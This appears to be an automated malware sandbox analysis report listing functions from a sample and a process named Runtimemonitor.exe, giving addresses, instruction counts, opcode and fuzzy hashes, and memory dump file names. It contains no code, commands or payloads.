Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,008CD32F,?), ref: 008CDA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,008CD32F,?), ref: 008CDA61

Strings

RTL, xrefs: 008CDA5B

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 4b1604abd28d382fa77ca2f2b3d5c541cf046251967f274660d30109f15052fb
Instruction ID: cfb18252a4d1817fbfef4019e652d12c9583277087ef4a0f8f60f7a25d156ae2
Opcode Fuzzy Hash: 4b1604abd28d382fa77ca2f2b3d5c541cf046251967f274660d30109f15052fb
Instruction Fuzzy Hash: EDC0123138575076D73027306C0DF632D98BB51B11F15045DB241DA1D0D9E5C941C650

Analysis Process: Runtimemonitor.exePID: 5860, Parent PID: 1988COMMON

Executed Functions

Function 00007FF848F1C61D Relevance: .7, Instructions: 687COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fd8286cc2af41cae38e927909417dc6bfce91c81c8c74aaaff3f4030e41c562
Instruction ID: 99c4ceb0327f5701643e2c3515d9fd45c34649d949c1376cf58ae018b76b2a6e
Opcode Fuzzy Hash: 1fd8286cc2af41cae38e927909417dc6bfce91c81c8c74aaaff3f4030e41c562
Instruction Fuzzy Hash: 0B221432D0D69A8EE751FBA8A8551FD7BE0FF553A5F1405B7C048CA0C3EF28684583A9

Function 00007FF848F1EB27 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

7, xrefs: 00007FF848F1EBC2
}, xrefs: 00007FF848F1EB5E

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID: 7$}
API String ID: 0-20563488
Opcode ID: d2586066ea8f8dc63ffdc10b73e1d41bfbaf23c7dd2bebcb894d23b09b1ab397
Instruction ID: 3da38ddc19ff354b65e1a8a55b1d74f2c3e35aa5d67675a2637884ce9448ed5d
Opcode Fuzzy Hash: d2586066ea8f8dc63ffdc10b73e1d41bfbaf23c7dd2bebcb894d23b09b1ab397
Instruction Fuzzy Hash: 5031A370E0862A8FEB68EF14C8957EAB7B1AF55351F1001FED44DA6291CB345E90CF49

Function 00007FF848F10D37 Relevance: 1.5, Strings: 1, Instructions: 232COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848F10EFE

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 19a5daa57392048da0ecbb2f1801c3c600cd9ca33a5fb47c8d501f5d523c2219
Instruction ID: d49c1bf9ca4585481e64938e70dd3ea8e38318aaa3d1797655e452b367d63ffa
Opcode Fuzzy Hash: 19a5daa57392048da0ecbb2f1801c3c600cd9ca33a5fb47c8d501f5d523c2219
Instruction Fuzzy Hash: B281BE71D199298EEB94FB28C819BE9B3B1FF94350F0042BAD40DE71D6DE386D858B44

Function 00007FF848F1E833 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

P, xrefs: 00007FF848F1E840

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 2ef18edea9b70cc3c80874e289b7bd95e91f866b38aa4f22ff514de5374ab344
Instruction ID: 792a9911aa843d5ba20b0e9aed7b5f5de2d37b3b5f3949eff79ae078bce14f8d
Opcode Fuzzy Hash: 2ef18edea9b70cc3c80874e289b7bd95e91f866b38aa4f22ff514de5374ab344
Instruction Fuzzy Hash: CC4119B0D19A598FEBA8EB18C8557A9B7B1FB54741F1002EAC40DE3281DF356D85CF09

Function 00007FF848F10A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

0vH, xrefs: 00007FF848F10A70

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID: 0vH
API String ID: 0-2857910901
Opcode ID: 2e1bed5173b83028aadacf63023b42f5ffb655bb6f67e4b58bfc86ed03a9bbee
Instruction ID: cc07e372c2cc964277ee7a73a4ae537da917ab7f0bbdf0aafdc2044ff6d8566d
Opcode Fuzzy Hash: 2e1bed5173b83028aadacf63023b42f5ffb655bb6f67e4b58bfc86ed03a9bbee
Instruction Fuzzy Hash: 81116A31D1C55E9EE780FB68D8492BA7BF1FF98380F4405B6D809C6192EF38A9448740

Function 00007FF848F1124D Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

hyH, xrefs: 00007FF848F112BD

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID: hyH
API String ID: 0-3369426750
Opcode ID: 2792cc93f7d83debff63080d6e17f4b99f3f48acdcd1b624164fbc7659d733b0
Instruction ID: 46414a223197c74f51c1d79ebc78a311e4de650ccd0811f82a63af6c6eeded70
Opcode Fuzzy Hash: 2792cc93f7d83debff63080d6e17f4b99f3f48acdcd1b624164fbc7659d733b0
Instruction Fuzzy Hash: C411B230D0D68E8EEB99EB64C4696F97BE0FF59341F4414BAD00AC60D3EF255980C710

Function 00007FF848F11260 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

hyH, xrefs: 00007FF848F112BD

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID: hyH
API String ID: 0-3369426750
Opcode ID: 6c06846004e48e8b5dda9e5ef094b26932047461327d03a11b1b720ff2cbc68f
Instruction ID: 0038be8250eecdc54658c27faa91ce1dc2a7b7a48f7d6c8826c8b930c09b7df7
Opcode Fuzzy Hash: 6c06846004e48e8b5dda9e5ef094b26932047461327d03a11b1b720ff2cbc68f
Instruction Fuzzy Hash: E3F0AF30D0D69F8EEB98ABA498187FA77E4FF56344F04147AD40EC20C2EF245994C650

Function 00007FF848F1D54A Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31166a6a0feea54cfe3ce25964a81c6e7430b1efc423abe5eada44c1a97911b4
Instruction ID: 82987310ea45b0e494ca8e666599cdf36352f3a66ba50edd870ffb6f9f99331e
Opcode Fuzzy Hash: 31166a6a0feea54cfe3ce25964a81c6e7430b1efc423abe5eada44c1a97911b4
Instruction Fuzzy Hash: A0E14B71D1965A9FEB98EB68D4957B8B7B1FF58340F5401BAD00EE32D6CB386880CB44

Function 00007FF848F11748 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8cd3181b00884de3d8afb7bfd3c7692ba09c36ec084a294c0cb5f827543901
Instruction ID: 29e6e89d9efa57913297b0ea1c67fdaa0ea9c1a84f430805f45cc85d6d7629d3
Opcode Fuzzy Hash: fa8cd3181b00884de3d8afb7bfd3c7692ba09c36ec084a294c0cb5f827543901
Instruction Fuzzy Hash: AC819C31A1CA498FDB98EF1898656B977E2FF98740F1405BEE44DC32C6CF24AC428785

Function 00007FF848F11D0D Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90923fa696ecc0b31e245290b758959b51eb5fb934587795be13f021e635a43f
Instruction ID: 373d734875eaa29fc434f6ab343356486b858825af72363f960d73cf299d3e1d
Opcode Fuzzy Hash: 90923fa696ecc0b31e245290b758959b51eb5fb934587795be13f021e635a43f
Instruction Fuzzy Hash: C251B031A1CA498FDB48EF1888545BA77E2FB98350F14457ED44AC7282CF34EC428785

Function 00007FF848F24D50 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e183a441776d69bd28e7ade0c14850cbf9e404141676fc6657c15329b81da8a
Instruction ID: d1b9204a4779dcf8187fc204b2cfc9722a09128c83dddfe86cdd431e16dd5c8a
Opcode Fuzzy Hash: 1e183a441776d69bd28e7ade0c14850cbf9e404141676fc6657c15329b81da8a
Instruction Fuzzy Hash: 22512B70D1891D8FEB94EB68D859BADB7F1FF68340F5001AAD00DE7296DF7568818B40

Function 00007FF848F13255 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d242d0008e6a44718cb61a0283f4d76caa5caab232c6fd2cf659c2a0408cca5f
Instruction ID: ded9869bf79b61117e05f1652e7ae9908662c07e564ef7604fad22522608b0a2
Opcode Fuzzy Hash: d242d0008e6a44718cb61a0283f4d76caa5caab232c6fd2cf659c2a0408cca5f
Instruction Fuzzy Hash: 9C512370D0C5098EEB54EBA8C8596EDBBB1EF49341F40017AD049E72D2DF38A944CB18

Function 00007FF848F12125 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 653f6bc332321146a54d4f087b75bfcf87cffd15b4a662468881bb746f966000
Instruction ID: 6735899cc8ca2f8067f3770e9c1099e009be61bf1439ce8f987546b57b69eff2
Opcode Fuzzy Hash: 653f6bc332321146a54d4f087b75bfcf87cffd15b4a662468881bb746f966000
Instruction Fuzzy Hash: 04412331E0DA8A4FE785EBB898551B8BBE1EF5A380F0400BAD40DC71D3DF28AC418365

Function 00007FF848F1BD72 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e10a4e3f94d4c607d9747718d4faf5c095eef460127414a350d7b17343113bb5
Instruction ID: af259deb15dad8263e92bdd0782c9d2c2d740e47869713f608dc0062125b5052
Opcode Fuzzy Hash: e10a4e3f94d4c607d9747718d4faf5c095eef460127414a350d7b17343113bb5
Instruction Fuzzy Hash: 3131B671E2C91D9EEB94EB6898956FCB7B1FF58340F544139D00DE3282DF246C819B44

Function 00007FF848F1C4FB Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3f509d08be400b154a756c462873f573faaa46c8cb184a8c27c78b8b61b95c7
Instruction ID: e8fd904c28356ce59835a69727b0458c9c3ccd81a9fef7b2317b6e7bf7717b85
Opcode Fuzzy Hash: f3f509d08be400b154a756c462873f573faaa46c8cb184a8c27c78b8b61b95c7
Instruction Fuzzy Hash: BA214F72D1E6669EE791B7ACA8051FD77A0FF613B5F440636D508890D2EF2C684082A9

Function 00007FF848F1BDEA Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66720890d1296801b0a8444a2b7146f508b11dc13f55e973145d1c34260a8998
Instruction ID: 45e84781b23813043440b846df4a8dca9c78a004d34641626feab4dbfc34c02c
Opcode Fuzzy Hash: 66720890d1296801b0a8444a2b7146f508b11dc13f55e973145d1c34260a8998
Instruction Fuzzy Hash: 0421C871E1C91D8FEB94FBA898956ACBBB1FF59340F54023AD00DE7282DF246C418B44

Function 00007FF848F137BA Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4bc65b916211fe7f5fa272e14cb1f936e0c929446106bcddcba8b87003007cb
Instruction ID: a01f88fd16c4341f41ebc5617e6c117e28c34c4e8071208a92afc3ec9bac2ea6
Opcode Fuzzy Hash: b4bc65b916211fe7f5fa272e14cb1f936e0c929446106bcddcba8b87003007cb
Instruction Fuzzy Hash: D431AF71A0D90A8FE749DF68D8147A97FF1EB953A0F9001BEC009C73C6CBB928058B40

Function 00007FF848F1C935 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f795e837bebc2953c50ee28fde5313de25c4ee24e0a881e04c5a449c2769b3dc
Instruction ID: 84bf42b52d6411516c2f64fa5825d1a7ee963cf015853d3b3d7944ab4636b38b
Opcode Fuzzy Hash: f795e837bebc2953c50ee28fde5313de25c4ee24e0a881e04c5a449c2769b3dc
Instruction Fuzzy Hash: 2F21A436A1D51A9EE75477ACF8091FAB3A0FF54375F400A36D509C5081DB3C65868698

Function 00007FF848F1C8BD Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88aa36731ab8899d001830a5a3ff74f498e6bf4ef81cb5f39fbdddead16cca7a
Instruction ID: fca1789b116d08eb374001c7a1510a9e63043b37c14e30cd70b12b93e2fe3b70
Opcode Fuzzy Hash: 88aa36731ab8899d001830a5a3ff74f498e6bf4ef81cb5f39fbdddead16cca7a
Instruction Fuzzy Hash: 6F21C032E1D91A9EE310BBACF8052FEB3A0FF443A6F500936D008C5082EB3C658587A5

Function 00007FF848F1C8D3 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61fe1f0b3ba82fac577dd75fb5ca82bbaf718eef929903b893a8783b4dd73a4
Instruction ID: fd2172dcfa335b21709931a6559982a69da1bd0deb6c319d27de280855741797
Opcode Fuzzy Hash: c61fe1f0b3ba82fac577dd75fb5ca82bbaf718eef929903b893a8783b4dd73a4
Instruction Fuzzy Hash: CE21D136A1D91A9EE3517BBCB4092FAB7A0FF40365F404A7BD008C90D2DB3C60858795

Function 00007FF848F13388 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64861ee6d2f9407a65fef491bbe90a652ad4d3876b40b29cdd3ab88f7cc2de56
Instruction ID: d22e06bca0d9fbf115672efdd3a52f53ed8f17eaae1f1daaf7a2c9ce3f447c99
Opcode Fuzzy Hash: 64861ee6d2f9407a65fef491bbe90a652ad4d3876b40b29cdd3ab88f7cc2de56
Instruction Fuzzy Hash: E221E070D089198FEB58EB98C494AECBBF1FF58341F50412AD009E72E1DF786840CB18

Function 00007FF848F1084D Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 351b6c5ae60aa706be22c93d7641bf4c254870e0fb69463d7fa2a5a2206e3fd4
Instruction ID: d4081e04062aec9ed2dcf42b421eeff39d64e59dadd2871f57c94fe5633300dc
Opcode Fuzzy Hash: 351b6c5ae60aa706be22c93d7641bf4c254870e0fb69463d7fa2a5a2206e3fd4
Instruction Fuzzy Hash: C3113131D0C69A9FE741BBB888891E97BE0FF95360F2400B2D408C60C3EA20A845C384

Function 00007FF848F13450 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84407b3b533696add8b7526ef5c59f5a82566bf17531a0799d259145f9a025
Instruction ID: acd30e4302166cc75e60d6dc093f6b923d231d7b2a89b2e89f89840f37c8bcb7
Opcode Fuzzy Hash: be84407b3b533696add8b7526ef5c59f5a82566bf17531a0799d259145f9a025
Instruction Fuzzy Hash: 7021A23084D68A4FD743AB74889C5A97FF4EF5B300F0804EBD449CB0A2DB2C9955C751

Function 00007FF848F1A968 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a902237bcda18e81db866ce48b92def1d5af2fcccd4a68d8561f245d73192389
Instruction ID: 739d4d5de7686cbefeee11cd3d2859cadda2f14f8acec7053ad07d62432cbd09
Opcode Fuzzy Hash: a902237bcda18e81db866ce48b92def1d5af2fcccd4a68d8561f245d73192389
Instruction Fuzzy Hash: EC212870D1860ACEEB59EB64C448BFEB6E1EF49340F1405BAD009E72D5DB38AD448B99

Function 00007FF848F1C600 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e123fdb41a106f2a266c2ccc2d69f583b60e88c14845bbda52c07a5e76ec1187
Instruction ID: 46a5c3b4581b6466fff68954341454da84f53c1a5958c160d2f050ac08079bed
Opcode Fuzzy Hash: e123fdb41a106f2a266c2ccc2d69f583b60e88c14845bbda52c07a5e76ec1187
Instruction Fuzzy Hash: 28215870D0CA1A8EEB11EBA9D4086EDB7F0EF18381F108176D419E61D1EF39A5848B68

Function 00007FF848F1C560 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eb995e8c1078fad81955605b219684f4b059f66319a7c52678bc86e545a8cb5
Instruction ID: 8f26d55a10145fa4a3f1b6ed90a2979c27d6cc0d76334013342e9677ce46d27d
Opcode Fuzzy Hash: 3eb995e8c1078fad81955605b219684f4b059f66319a7c52678bc86e545a8cb5
Instruction Fuzzy Hash: 70115B7180D69D9EEB46FB6888581B97BA0FF29341F0405BAD409C71D2EB745940C755

Function 00007FF848F1BCC9 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f75dd3c4e15e97f7d4f019c46299674b7521126d3fef9536ff233d624dfd3b
Instruction ID: 280816bf6f5c131d60d5c6ecc807b36793ccfd8a8ed5694f902c149b907949ae
Opcode Fuzzy Hash: 03f75dd3c4e15e97f7d4f019c46299674b7521126d3fef9536ff233d624dfd3b
Instruction Fuzzy Hash: E0115930D1C6898EEB5AAB64C8147EA7BF0EF05310F0905BAD008D62D2DB38AE44CB85

Function 00007FF848F13575 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c40daaf78ed64a271a74b56db688da71ee205e61c774fb969044888fb60d45b
Instruction ID: f78373ef81fc8c55d805e0185c6dcf86429fa4846e5d764bbc8a015b3240f53b
Opcode Fuzzy Hash: 5c40daaf78ed64a271a74b56db688da71ee205e61c774fb969044888fb60d45b
Instruction Fuzzy Hash: 3C115B7091868E8FEB98EF6884592BE7BA0FF18745F4008BED419C21D1DB38A9448704

Function 00007FF848F1B865 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0784419b8f88f418b2801f9b907ec45034fb3268ca8e1e5936681a53d213836e
Instruction ID: bad3bf79a2f2e59c1023b5e0c60fe9cf9dadebcd1491b7930231a37a849c6c1b
Opcode Fuzzy Hash: 0784419b8f88f418b2801f9b907ec45034fb3268ca8e1e5936681a53d213836e
Instruction Fuzzy Hash: 68118B7091DA4E8FEB99FF2484982B9BBE0FF28351F5505BED409C6191DB34A941C704

Function 00007FF848F1C435 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4127cce529e6f02f4144b0fef51f605b7572ad2980c7dba3e485f656b5113c51
Instruction ID: 2577777877e5ecd7b4dd7e0b671057b6419e1f51c410d2205f891d06253d64f4
Opcode Fuzzy Hash: 4127cce529e6f02f4144b0fef51f605b7572ad2980c7dba3e485f656b5113c51
Instruction Fuzzy Hash: EF110930908A0E8EDB98EF68C45A6BEB7E1FF68345F10057AE41AD2590DB35A591CB84

Function 00007FF848F12EB1 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb79c7cdbd9eb726c59c8e270cf15a7a97965e7bd6cdc163bb4fcec4cc64488
Instruction ID: 1bb9b714223f180c9e225e4f126a49d3c65c81313fcca48d19f86cc30ae7bfef
Opcode Fuzzy Hash: 8bb79c7cdbd9eb726c59c8e270cf15a7a97965e7bd6cdc163bb4fcec4cc64488
Instruction Fuzzy Hash: ED01AD3091D64E8FE745FBA8888D2A9BBE0FF59340F4509B6D40CC70E6EB38E9848715

Function 00007FF848F105D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb3a1bd2ff544650f8b265e4324c810aa430e73b64e4195164ac80a78a83bdc8
Instruction ID: f73a918d124278eb04ba23728a1e2923bd681b724422e3edbe9cdbaa28ba96f9
Opcode Fuzzy Hash: cb3a1bd2ff544650f8b265e4324c810aa430e73b64e4195164ac80a78a83bdc8
Instruction Fuzzy Hash: 52014C3090990E8EEB48FF64C0596FA77A1FF58345F50547AD40ED26D2DB35A990CB48

Function 00007FF848F1AA38 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Runtimemonitor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc4c11f701f95c9fa15e62a760d769b184cc632e77e0095bb9b9e8819c3b8260
Instruction ID: 7f566105d668617767450d88778bd79e91779fb016385e0adc45a4cc6eae8bd1
Opcode Fuzzy Hash: fc4c11f701f95c9fa15e62a760d769b184cc632e77e0095bb9b9e8819c3b8260
Instruction Fuzzy Hash: CD015A3092890E9EEB88FB64C4986BEB7E0FF18341F54087AE41ED2190EF31A990C704

Function 00007FF848F1288D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2112502632.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

